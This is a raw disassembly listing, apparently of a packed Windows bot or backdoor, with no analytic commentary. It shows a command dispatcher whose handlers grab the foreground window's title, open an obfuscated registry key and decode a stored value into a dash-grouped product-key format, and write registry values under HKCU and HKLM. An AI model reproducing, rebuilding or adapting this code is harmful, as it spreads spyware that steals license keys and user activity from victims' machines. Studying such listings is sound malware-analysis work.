loc_40A867: ; CODE XREF: sub_40A6EB+176�j
jmp short loc_40A831
; ---------------------------------------------------------------------------
loc_40A869: ; CODE XREF: sub_40A6EB+13E�j
xor al, al
locret_40A86B: ; CODE XREF: sub_40A6EB+1A�j
; sub_40A6EB+39�j ...
leave
retn
sub_40A6EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A86D proc near ; CODE XREF: sub_40A8AD+FD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_4], 1
cmp [ebp+arg_4], 0
jnz short loc_40A884
push 1
pop eax
jmp short locret_40A8AB
; ---------------------------------------------------------------------------
loc_40A884: ; CODE XREF: sub_40A86D+10�j
mov [ebp+var_8], 1
jmp short loc_40A894
; ---------------------------------------------------------------------------
loc_40A88D: ; CODE XREF: sub_40A86D+39�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40A894: ; CODE XREF: sub_40A86D+1E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
loc_40A89A: ; DATA XREF: UPX1:0041AE78�o
; UPX1:0041AEBC�o ...
jg short loc_40A8A8
mov eax, [ebp+var_4]
imul eax, [ebp+arg_0]
mov [ebp+var_4], eax
jmp short loc_40A88D
; ---------------------------------------------------------------------------
loc_40A8A8: ; CODE XREF: sub_40A86D:loc_40A89A�j
mov eax, [ebp+var_4]
locret_40A8AB: ; CODE XREF: sub_40A86D+15�j
leave
retn
sub_40A86D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A8AD proc near ; CODE XREF: sub_406509+26�p
; sub_40A9CF+193F�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push esi
push edi
mov [ebp+var_4], 1
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_20], 0
mov esi, offset aAbcdef ; "abcdef"
lea edi, [ebp+var_1C]
movsd
movsw
movsb
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 30h
jnz short loc_40A90C
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 78h
jz short loc_40A905
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 58h
jnz short loc_40A90C
loc_40A905: ; CODE XREF: sub_40A8AD+48�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_40A90C: ; CODE XREF: sub_40A8AD+33�j
; sub_40A8AD+56�j
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_20]
mov [ebp+var_14], eax
jmp short loc_40A927
; ---------------------------------------------------------------------------
loc_40A920: ; CODE XREF: sub_40A8AD+116�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_40A927: ; CODE XREF: sub_40A8AD+71�j
mov eax, [ebp+var_14]
cmp eax, [ebp+var_28]
jge loc_40A9C8
mov eax, [ebp+arg_0]
add eax, [ebp+var_14]
movsx eax, byte ptr [eax]
push eax
call sub_416DE4 ; tolower
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 30h
jl short loc_40A95D
cmp [ebp+var_8], 39h
jg short loc_40A95D
mov eax, [ebp+var_8]
sub eax, 30h
mov [ebp+var_10], eax
jmp short loc_40A9A0
; ---------------------------------------------------------------------------
loc_40A95D: ; CODE XREF: sub_40A8AD+9D�j
; sub_40A8AD+A3�j
cmp [ebp+var_8], 61h
jl short loc_40A99C
cmp [ebp+var_8], 66h
jg short loc_40A99C
and [ebp+var_24], 0
jmp short loc_40A976
; ---------------------------------------------------------------------------
loc_40A96F: ; CODE XREF: sub_40A8AD:loc_40A998�j
mov eax, [ebp+var_24]
inc eax
mov [ebp+var_24], eax
loc_40A976: ; CODE XREF: sub_40A8AD+C0�j
mov eax, [ebp+var_24]
movsx eax, [ebp+eax+var_1C]
test eax, eax
jz short loc_40A99A
mov eax, [ebp+var_24]
movsx eax, [ebp+eax+var_1C]
cmp [ebp+var_8], eax
jnz short loc_40A998
mov eax, [ebp+var_24]
add eax, 0Ah
mov [ebp+var_10], eax
loc_40A998: ; CODE XREF: sub_40A8AD+E0�j
jmp short loc_40A96F
; ---------------------------------------------------------------------------
loc_40A99A: ; CODE XREF: sub_40A8AD+D3�j
jmp short loc_40A9A0
; ---------------------------------------------------------------------------
loc_40A99C: ; CODE XREF: sub_40A8AD+B4�j
; sub_40A8AD+BA�j
xor eax, eax
jmp short loc_40A9CB
; ---------------------------------------------------------------------------
loc_40A9A0: ; CODE XREF: sub_40A8AD+AE�j
; sub_40A8AD:loc_40A99A�j
mov eax, [ebp+var_28]
sub eax, [ebp+var_14]
dec eax
push eax
push 10h
call sub_40A86D
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
imul eax, [ebp+var_10]
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
jmp loc_40A920
; ---------------------------------------------------------------------------
loc_40A9C8: ; CODE XREF: sub_40A8AD+80�j
mov eax, [ebp+var_C]
loc_40A9CB: ; CODE XREF: sub_40A8AD+F1�j
pop edi
pop esi
leave
retn
sub_40A8AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9CF proc near ; CODE XREF: sub_40D871+C95�p
; sub_40D871+D9C�p
var_6424 = dword ptr -6424h
var_6420 = dword ptr -6420h
var_641C = dword ptr -641Ch
var_6418 = dword ptr -6418h
var_6414 = dword ptr -6414h
var_6410 = dword ptr -6410h
var_640C = dword ptr -640Ch
var_6408 = dword ptr -6408h
var_6404 = dword ptr -6404h
var_6400 = dword ptr -6400h
var_63FC = dword ptr -63FCh
var_63F8 = dword ptr -63F8h
var_63F4 = dword ptr -63F4h
var_63F0 = dword ptr -63F0h
var_63EC = dword ptr -63ECh
var_63E8 = dword ptr -63E8h
var_63E4 = dword ptr -63E4h
var_63E0 = dword ptr -63E0h
var_63DC = dword ptr -63DCh
var_63D8 = dword ptr -63D8h
var_63D4 = dword ptr -63D4h
var_63D0 = dword ptr -63D0h
var_63CC = dword ptr -63CCh
var_63C8 = dword ptr -63C8h
var_63C4 = dword ptr -63C4h
var_63C0 = dword ptr -63C0h
var_63BC = dword ptr -63BCh
var_63B8 = dword ptr -63B8h
var_63B4 = word ptr -63B4h
var_63B2 = word ptr -63B2h
var_63B0 = dword ptr -63B0h
var_63A4 = dword ptr -63A4h
var_63A0 = byte ptr -63A0h
var_639C = dword ptr -639Ch
var_6398 = byte ptr -6398h
var_6397 = byte ptr -6397h
var_6396 = byte ptr -6396h
var_6395 = byte ptr -6395h
var_6394 = byte ptr -6394h
var_6393 = byte ptr -6393h
var_6392 = byte ptr -6392h
var_6391 = byte ptr -6391h
var_6390 = byte ptr -6390h
var_638F = byte ptr -638Fh
var_638E = byte ptr -638Eh
var_638D = byte ptr -638Dh
var_638C = dword ptr -638Ch
var_6388 = byte ptr -6388h
var_5F84 = dword ptr -5F84h
var_5F80 = byte ptr -5F80h
var_5B7C = dword ptr -5B7Ch
var_5B78 = dword ptr -5B78h
var_5B74 = byte ptr -5B74h
var_5A70 = dword ptr -5A70h
var_5A6C = dword ptr -5A6Ch
var_5A68 = dword ptr -5A68h
var_5A64 = byte ptr -5A64h
var_1A64 = dword ptr -1A64h
var_1A60 = byte ptr -1A60h
var_A60 = dword ptr -0A60h
var_A5C = byte ptr -0A5Ch
var_A38 = byte ptr -0A38h
var_A30 = dword ptr -0A30h
var_A2C = dword ptr -0A2Ch
var_A28 = dword ptr -0A28h
var_A24 = dword ptr -0A24h
var_A20 = dword ptr -0A20h
var_A1C = dword ptr -0A1Ch
var_A18 = byte ptr -0A18h
var_9F8 = dword ptr -9F8h
var_9F4 = byte ptr -9F4h
var_9EF = byte ptr -9EFh
var_9EA = byte ptr -9EAh
var_9E5 = byte ptr -9E5h
var_9E0 = byte ptr -9E0h
var_9DB = byte ptr -9DBh
var_9D8 = byte ptr -9D8h
var_9A4 = byte ptr -9A4h
var_970 = byte ptr -970h
var_8DC = dword ptr -8DCh
var_8D8 = byte ptr -8D8h
var_8D3 = byte ptr -8D3h
var_8D2 = byte ptr -8D2h
var_8CD = byte ptr -8CDh
var_8CC = byte ptr -8CCh
var_8C7 = byte ptr -8C7h
var_8C6 = byte ptr -8C6h
var_8C1 = byte ptr -8C1h
var_8C0 = byte ptr -8C0h
var_8BB = byte ptr -8BBh
var_8B8 = byte ptr -8B8h
var_8A0 = byte ptr -8A0h
var_720 = dword ptr -720h
var_71C = dword ptr -71Ch
var_718 = byte ptr -718h
var_59B = byte ptr -59Bh
var_598 = byte ptr -598h
var_418 = dword ptr -418h
var_414 = byte ptr -414h
var_214 = byte ptr -214h
var_1F0 = byte ptr -1F0h
var_1CC = byte ptr -1CCh
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
var_183 = byte ptr -183h
var_83 = dword ptr -83h
var_7F = byte ptr -7Fh
var_19 = byte ptr -19h
var_B = byte ptr -0Bh
var_8 = byte ptr -8
var_5 = dword ptr -5
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, 6424h
call sub_416BC0
push esi
push edi
mov eax, [ebp+arg_14]
push dword ptr [eax]
call sub_40ED38
pop ecx
mov [ebp+var_1A8], eax
push [ebp+arg_0]
lea eax, [ebp+var_1A4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_183]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+arg_C]
mov [ebp+var_83], eax
push 7Ah
push [ebp+arg_10]
lea eax, [ebp+var_7F]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov [ebp+var_5], 1
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419F18
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AA59
lea eax, [ebp+var_1A4]
push eax
call sub_415AF0
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AA59: ; CODE XREF: sub_40A9CF+76�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419F0C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AACF
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40AAAC
lea eax, [ebp+var_214]
push eax
lea eax, [ebp+var_1F0]
push eax
lea eax, [ebp+var_1CC]
push eax
call sub_40668F
add esp, 0Ch
lea eax, [ebp+var_1CC]
push eax
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AAAC: ; CODE XREF: sub_40A9CF+A6�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D7E5
pop ecx
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AACF: ; CODE XREF: sub_40A9CF+9D�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419EF8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AB21
push 200h
lea eax, [ebp+var_414]
push eax
call ds:dword_4171D8 ; GetForegroundWindow
push eax
call ds:dword_4171E4 ; GetWindowTextA
test eax, eax
jle short loc_40AB1C
lea eax, [ebp+var_414]
push eax
push offset dword_419EDC
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AB1C: ; CODE XREF: sub_40A9CF+130�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AB21: ; CODE XREF: sub_40A9CF+113�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419ED0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AB56
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4077DD
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AB56: ; CODE XREF: sub_40A9CF+165�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419EC4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40AC89
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz loc_40AC84
push 180h
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_598]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_598]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_418], eax
cmp [ebp+var_418], 3
jle short loc_40ABFE
push offset dword_419EC0
mov eax, [ebp+var_418]
lea eax, [ebp+eax+var_59B]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40ABFE
mov eax, [ebp+var_418]
and [ebp+eax+var_59B], 0
lea eax, [ebp+var_598]
push eax
call sub_4078A0
pop ecx
lea eax, [ebp+var_598]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_418], eax
loc_40ABFE: ; CODE XREF: sub_40A9CF+1E1�j
; sub_40A9CF+1FF�j
mov eax, [ebp+var_418]
cdq
push 4
pop ecx
idiv ecx
mov ecx, [ebp+var_418]
sub ecx, eax
cmp ecx, 180h
jbe short loc_40AC1F
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AC1F: ; CODE XREF: sub_40A9CF+249�j
push [ebp+var_418]
lea eax, [ebp+var_598]
push eax
call sub_40EF29
pop ecx
pop ecx
push [ebp+var_418]
lea eax, [ebp+var_598]
push eax
call sub_40EF59
pop ecx
pop ecx
mov [ebp+var_418], eax
push [ebp+var_418]
lea eax, [ebp+var_718]
push eax
lea eax, [ebp+var_598]
push eax
call sub_40EB4E
add esp, 0Ch
lea eax, [ebp+var_718]
push eax
push offset dword_419E9C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AC84: ; CODE XREF: sub_40A9CF+1A7�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AC89: ; CODE XREF: sub_40A9CF+19A�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419E90
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40AD84
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
cmp eax, 3Dh
jnz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_40EC96
pop ecx
test eax, eax
jz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_71C], eax
mov eax, [ebp+var_71C]
cdq
push 4
pop ecx
idiv ecx
mov ecx, [ebp+var_71C]
sub ecx, eax
cmp ecx, 180h
jbe short loc_40AD0C
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AD0C: ; CODE XREF: sub_40A9CF+336�j
lea eax, [ebp+var_8A0]
push eax
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_720], eax
push [ebp+var_720]
lea eax, [ebp+var_8A0]
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_720], eax
push [ebp+var_720]
lea eax, [ebp+var_8A0]
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+var_720]
and [ebp+eax+var_8A0], 0
lea eax, [ebp+var_8A0]
push eax
push offset dword_419E70
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AD7F: ; CODE XREF: sub_40A9CF+2DA�j
; sub_40A9CF+2EC�j ...
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AD84: ; CODE XREF: sub_40A9CF+2CD�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419E60
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40ADB2
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406643
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40ADB2: ; CODE XREF: sub_40A9CF+3C8�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419E50
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40ADD9
lea eax, [ebp+var_1A4]
push eax
call sub_4064BF
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40ADD9: ; CODE XREF: sub_40A9CF+3F6�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419E48
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B0B6
and [ebp+var_9F8], 0
mov [ebp+var_A1C], 0C8h
push 0Ch
pop ecx
mov esi, offset aKnqQxjnuXxQEBZ ; "ªŸ¼Ÿ•†ž»ß•å¸šÉŸ¶…¿¡º°§µ…–¸Ã‹ªÓ‹°¼†¼‚±"...
lea edi, [ebp+var_9D8]
rep movsd
movsb
push 5
pop ecx
mov esi, offset dword_419DFC
lea edi, [ebp+var_8B8]
rep movsd
movsb
lea eax, [ebp+var_9D8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_9F8]
push eax
push 20019h
push 0
lea eax, [ebp+var_9D8]
push eax
push 80000002h
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jz short loc_40AE7D
lea eax, [ebp+var_9D8]
push eax
call sub_4105AD
pop ecx
cmp [ebp+var_9F8], 0
jz short loc_40AE78
push [ebp+var_9F8]
call ds:dword_417028 ; RegCloseKey
loc_40AE78: ; CODE XREF: sub_40A9CF+49B�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AE7D: ; CODE XREF: sub_40A9CF+485�j
lea eax, [ebp+var_9D8]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_8B8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_A1C]
push eax
lea eax, [ebp+var_9A4]
push eax
push 0
push 0
lea eax, [ebp+var_8B8]
push eax
push [ebp+var_9F8]
call ds:dword_41700C ; RegQueryValueExA
test eax, eax
jz short loc_40AEE7
lea eax, [ebp+var_8B8]
push eax
call sub_4105AD
pop ecx
cmp [ebp+var_9F8], 0
jz short loc_40AEE2
push [ebp+var_9F8]
call ds:dword_417028 ; RegCloseKey
loc_40AEE2: ; CODE XREF: sub_40A9CF+505�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AEE7: ; CODE XREF: sub_40A9CF+4EF�j
lea eax, [ebp+var_8B8]
push eax
call sub_4105AD
pop ecx
push [ebp+var_9F8]
call ds:dword_417028 ; RegCloseKey
push 7
pop ecx
mov esi, offset dword_419DDC
lea edi, [ebp+var_A18]
rep movsd
movsb
lea eax, [ebp+var_A18]
push eax
call sub_4105FB
pop ecx
and [ebp+var_9DB], 0
mov [ebp+var_8DC], 18h
jmp short loc_40AF3E
; ---------------------------------------------------------------------------
loc_40AF31: ; CODE XREF: sub_40A9CF+60B�j
mov eax, [ebp+var_8DC]
dec eax
mov [ebp+var_8DC], eax
loc_40AF3E: ; CODE XREF: sub_40A9CF+560�j
cmp [ebp+var_8DC], 0
jl loc_40AFDF
and [ebp+var_A20], 0
mov [ebp+var_A24], 0Eh
jmp short loc_40AF6B
; ---------------------------------------------------------------------------
loc_40AF5E: ; CODE XREF: sub_40A9CF+5EF�j
mov eax, [ebp+var_A24]
dec eax
mov [ebp+var_A24], eax
loc_40AF6B: ; CODE XREF: sub_40A9CF+58D�j
cmp [ebp+var_A24], 0
jl short loc_40AFC0
mov eax, [ebp+var_A20]
shl eax, 8
mov ecx, [ebp+var_A24]
movzx ecx, [ebp+ecx+var_970]
add eax, ecx
mov [ebp+var_A20], eax
mov eax, [ebp+var_A20]
cdq
push 18h
pop ecx
idiv ecx
mov ecx, [ebp+var_A24]
mov [ebp+ecx+var_970], al
mov eax, [ebp+var_A20]
cdq
push 18h
pop ecx
idiv ecx
mov [ebp+var_A20], edx
jmp short loc_40AF5E
; ---------------------------------------------------------------------------
loc_40AFC0: ; CODE XREF: sub_40A9CF+5A3�j
mov eax, [ebp+var_8DC]
mov ecx, [ebp+var_A20]
mov cl, [ebp+ecx+var_A18]
mov [ebp+eax+var_9F4], cl
jmp loc_40AF31
; ---------------------------------------------------------------------------
loc_40AFDF: ; CODE XREF: sub_40A9CF+576�j
lea eax, [ebp+var_A18]
push eax
call sub_4105AD
pop ecx
and [ebp+var_8BB], 0
mov [ebp+var_8C1], 2Dh
mov al, [ebp+var_8C1]
mov [ebp+var_8C7], al
mov al, [ebp+var_8C7]
mov [ebp+var_8CD], al
mov al, [ebp+var_8CD]
mov [ebp+var_8D3], al
push 5
lea eax, [ebp+var_9F4]
push eax
lea eax, [ebp+var_8D8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9EF]
push eax
lea eax, [ebp+var_8D2]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9EA]
push eax
lea eax, [ebp+var_8CC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9E5]
push eax
lea eax, [ebp+var_8C6]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9E0]
push eax
lea eax, [ebp+var_8C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_8D8]
push eax
push offset dword_418B64
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B0B6: ; CODE XREF: sub_40A9CF+41D�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419DCC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B11C
mov [ebp+var_8], 1
movsx eax, [ebp+var_19]
test eax, eax
jz short loc_40B0E6
lea eax, [ebp+var_1A4]
push eax
call sub_411D68
pop ecx
jmp short loc_40B117
; ---------------------------------------------------------------------------
loc_40B0E6: ; CODE XREF: sub_40A9CF+706�j
movsx eax, [ebp+var_B]
test eax, eax
jz short loc_40B0FD
lea eax, [ebp+var_1A4]
push eax
call sub_4123F6
pop ecx
jmp short loc_40B117
; ---------------------------------------------------------------------------
loc_40B0FD: ; CODE XREF: sub_40A9CF+71D�j
lea eax, [ebp+var_1A4]
push eax
call sub_411D68
pop ecx
lea eax, [ebp+var_1A4]
push eax
call sub_4123F6
pop ecx
loc_40B117: ; CODE XREF: sub_40A9CF+715�j
; sub_40A9CF+72C�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B11C: ; CODE XREF: sub_40A9CF+6FA�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419DBC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B143
lea eax, [ebp+var_1A4]
push eax
call sub_414EB0
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B143: ; CODE XREF: sub_40A9CF+760�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419DB0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B247
push 8
pop ecx
mov esi, offset dword_419D8C
lea edi, [ebp+var_A5C]
rep movsd
movsb
mov esi, offset dword_419D84
lea edi, [ebp+var_A38]
movsd
movsw
movsx eax, [ebp+var_A38]
mov ecx, ds:off_41DB18
movsx ecx, byte ptr [ecx]
sub eax, ecx
neg eax
sbb eax, eax
inc eax
mov [ebp+var_A30], eax
cmp [ebp+var_A30], 0
jz short loc_40B1AD
mov [ebp+var_63E4], offset dword_419D78
jmp short loc_40B1B7
; ---------------------------------------------------------------------------
loc_40B1AD: ; CODE XREF: sub_40A9CF+7D0�j
mov [ebp+var_63E4], offset dword_419D68
loc_40B1B7: ; CODE XREF: sub_40A9CF+7DC�j
mov eax, [ebp+var_63E4]
mov [ebp+var_A28], eax
cmp [ebp+var_A30], 0
jz short loc_40B1D8
mov [ebp+var_63E8], offset aThisBuildIsFul ; "This build is fully functional"
jmp short loc_40B1E2
; ---------------------------------------------------------------------------
loc_40B1D8: ; CODE XREF: sub_40A9CF+7FB�j
mov [ebp+var_63E8], offset aThisBuildIsBro ; "This build is broken and will not funct"...
loc_40B1E2: ; CODE XREF: sub_40A9CF+807�j
mov eax, [ebp+var_63E8]
mov [ebp+var_A2C], eax
lea eax, [ebp+var_A5C]
push eax
call sub_4105FB
pop ecx
push [ebp+var_A2C]
push [ebp+var_A28]
mov eax, ds:dword_41ED00
and eax, 0FFFFh
push eax
movsx eax, byte ptr ds:dword_41DAF8
and eax, 0FFh
push eax
lea eax, [ebp+var_A5C]
push eax
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 18h
lea eax, [ebp+var_A5C]
push eax
call sub_4105AD
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B247: ; CODE XREF: sub_40A9CF+787�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419D08
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B28E
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_405E45
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B28E: ; CODE XREF: sub_40A9CF+88B�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419CFC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B2C5
mov eax, [ebp+arg_18]
add eax, 4
push eax
mov eax, [ebp+arg_14]
add eax, 4
push eax
lea eax, [ebp+var_1A4]
push eax
call sub_4167DD
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B2C5: ; CODE XREF: sub_40A9CF+8D2�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419CF0
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B2EF
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419CE4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B300
loc_40B2EF: ; CODE XREF: sub_40A9CF+909�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40D74D
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B300: ; CODE XREF: sub_40A9CF+91E�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419CD4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B335
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_403260
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B335: ; CODE XREF: sub_40A9CF+944�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419CC8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B36A
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40260D
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B36A: ; CODE XREF: sub_40A9CF+979�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419CB8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B3A5
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406509
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3A5: ; CODE XREF: sub_40A9CF+9AE�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419CA8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B3DA
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_41665C
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3DA: ; CODE XREF: sub_40A9CF+9E9�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C98
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B426
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B3FD
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3FD: ; CODE XREF: sub_40A9CF+A27�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push 80000001h
call sub_401000
pop ecx
pop ecx
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push 80000002h
call sub_401000
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B426: ; CODE XREF: sub_40A9CF+A1E�j
mov eax, [ebp+var_1A8]
